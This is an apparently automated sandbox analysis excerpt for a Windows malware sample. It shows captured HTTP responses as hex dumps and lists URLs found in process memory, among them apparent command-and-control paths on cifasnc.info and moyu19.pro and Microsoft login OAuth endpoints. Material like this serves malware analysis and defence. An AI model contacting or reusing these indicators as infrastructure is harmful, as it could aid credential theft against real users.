61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:40:05 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:40:07 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 12 Jan 2025 16:39:38 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 12 Jan 2025 16:39:41 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 12 Jan 2025 16:39:43 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 12 Jan 2025 16:39:46 GMTContent-Type: text/htmlContent-Length: 0Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Mon, 13 Jan 2025 08:40:41 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Mon, 13 Jan 2025 08:40:43 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Mon, 13 Jan 2025 08:40:46 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Mon, 13 Jan 2025 08:40:49 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:41:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Mon, 13 Jan 2025 08:41:08 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxBKjvEuN9gprfaPeo8Cu3618eXqC6kTqgsVJWDseemkfOnlBJ%2FDH%2FJQC0Nc5srKeTmv%2FgaxbNF3oImaM59vSKQkG0AoREa8I8LDyPWHpFaBq1GrCO3rlhn2468wFQSnKZ2w"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901415e6ea3a423d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1690&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=734&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:41:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Mon, 13 Jan 2025 08:41:11 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4XPBm9Y4eZBJ1N9LjSAyhym9waKlRjA8wpV%2FH0FoM9jfxx1x%2FrI0k%2BJMHFlOmAYJC82O9xXmwsvgTvmHQ8301PL38UwHO%2FYh2bW3TYpIw9SUeQsL8foEJJH1a253wJ1MRoUk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901415f6da8442ee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1725&rtt_var=862&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=754&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:41:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-pingback: http://cifasnc.info/xmlrpc.phpexpires: Wed, 11 Jan 1984 05:00:00 GMTlast-modified: Mon, 13 Jan 2025 08:41:14 GMTcache-control: no-cache, must-revalidate, max-age=0pragma: no-cachevary: Accept-Encoding,User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BbjJUBOlFhkpEs5psCZdmLQGDb2CzbU%2BexumrguvZnk%2BV48wAVR1KWDSvmtjD7aRsVgkyXPsiLyC9yImWeUdiVpS1zxPlj4EZ9KyNgF48SY%2FeSAdXxP4LEB2rZOJOjhqkb1z"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90141606c9888ca1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1989&rtt_var=994&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10836&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#
              Source: fc.exe, 00000005.00000002.4279422852.0000000004E16000.00000004.10000000.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278982645.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/8rr3/?88v07=iJ8hmWjdEFuk0u09mxt/i
              Source: fc.exe, 00000005.00000002.4279422852.0000000004E16000.00000004.10000000.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278982645.0000000003D46000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cifasnc.info/xmlrpc.php
              Source: gGZaaTbTIZmmI.exe, 00000006.00000002.4278386496.0000000000D32000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moyu19.pro
              Source: gGZaaTbTIZmmI.exe, 00000006.00000002.4278386496.0000000000D32000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.moyu19.pro/b9e2/
              Source: fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fc.exe, 00000005.00000002.4279422852.000000000463C000.00000004.10000000.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278982645.000000000356C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 00000005.00000002.4277873334.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 00000005.00000002.4277873334.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 00000005.00000002.4277873334.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 00000005.00000002.4277873334.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
              Source: fc.exe, 00000005.00000002.4277873334.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033$
              Source: fc.exe, 00000005.00000002.4277873334.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 00000005.00000002.4277873334.000000000305A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 00000005.00000003.2358500033.0000000007DA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: fc.exe, 00000005.00000002.4279422852.000000000513A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000005.00000002.4281442123.0000000006380000.00000004.00000800.00020000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278982645.000000000406A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
